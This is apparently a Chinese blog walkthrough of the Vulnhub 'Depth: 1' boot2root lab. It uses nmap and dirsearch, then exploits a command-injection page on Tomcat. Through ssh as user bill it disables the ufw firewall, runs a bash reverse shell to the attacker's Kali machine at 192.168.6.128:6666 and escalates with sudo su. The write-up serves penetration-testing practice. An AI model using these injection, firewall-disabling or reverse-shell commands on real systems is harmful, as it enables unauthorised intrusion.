0x01 项目地址
0x02 靶机描述
Many times while conducting a pentest, I need to script something up to make my life easier or to quickly test an attack idea or vector. Recently I came across an interesting command injection vector on a web application sitting on a client's internet-facing estate. There was a page, running in Java, that allowed me to type arbitrary commands into a form, and have it execute them. While developer-provided webshells are always nice, there were a few caveats. The page was expecting directory listing style output, which was then parsed and reformatted. If the output didn't match this parsing, no output to me. Additionally, there was no egress. ICMP, and all TCP/UDP ports including DNS were blocked outbound.
很多时候,在进行渗透测试时,我需要编写一些脚本来使我的生活更轻松,或者快速测试攻击想法或向量。最近,我在一个客户端面向互联网的网页应用程序上遇到了一个有趣的命令注入向量。有一个页面,在Java中运行,允许我在表单中输入任意命令,并让它执行它们。虽然开发人员提供的webshell总是很好,但也有一些警告。该页面需要目录列表样式的输出,然后将其解析并重新格式化。如果输出不匹配这个解析,没有输出给我。另外,没有出口。所有TCP/UDP端口(包括DNS)都被阻止出站。
I was still able to leverage the command injection to compromise not just the server, but the entire infrastructure it was running on. After the dust settled, the critical report was made, and the vulnerability was closed, I thought the entire attack path was kind of fun, and decided to share how I went about it. Since I enjoy being a free man and only occasionally visit prisons, I've created a simple boot2root style VM that has a similar set of vulnerabilities to use in a walkthrough.
我仍然能够利用命令注入不仅危害服务器,而且危害它运行的整个基础设施。尘埃落定后,关键报告被提出,漏洞被关闭,我认为整个攻击路径是一种乐趣,并决定分享我是如何做到这一点的。因为我喜欢做一个自由的人,只是偶尔访问监狱,我已经创建了一个简单的boot2root风格的VM,它有一组类似的漏洞,可以在演练中使用。
0x03 环境搭建
| 靶机 | Depth: 1 | NAT模式 192.168.6.165 |
| 攻击机 | kali | NAT模式 192.168.6.128 |
0x04 详细步骤
1.主机发现
靶机开机已经告诉我们IP地址了,不过我们还是扫描确认一下
nmap -sP 192.168.6.0/24
2.端口扫描
nmap -p- -A -sV -Pn 192.168.6.165开启了8080http端口
3.目录扫描
dirsearch -u 192.168.6.165:8080
4.Web访问
浏览器访问192.168.6.165:8080
有一大段英文,翻译见下图,这是一个tomcat网页
拼接访问/manager/,弹出个登录框
http://192.168.6.165:8080/manager
拼接访问/test.jsp,得到一个输入框
翻译一下
5.漏洞挖掘
根据提示,输入ls -l /tmp,命令执行成功
这里能执行命令,尝试在这里直接反弹shell,结果失败了
尝试一下能不能执行其他命令
ls -l /home #查看家目录通过查看家目录,发现用户bill
接着来查看一下进程
ps -aux发现ssh服务正在运行,但刚才端口扫描时并未扫到,猜测有可能存在防火墙拦截
接着看一下/etc目录,看看是否存在防火墙
ls -l /etc/确认存在防火墙ufw
尝试关闭防火墙
ssh bill@localhost sudo ufw disable看样子应该是执行成功了
6.漏洞利用
接下来尝试反弹shell,kali开启监听
nc -lvvp 6666
然后执行命令
ssh bill@localhost bash -i >& /dev/tcp/192.168.6.128/6666 0>&1
成功getshell
7.权限提升
尝试直接切换root
sudo su
提权成功!
标签:6.165,防火墙,192.168,Depth,Vulnhub,靶机,was,目录 From: https://blog.csdn.net/weixin_57289348/article/details/142528566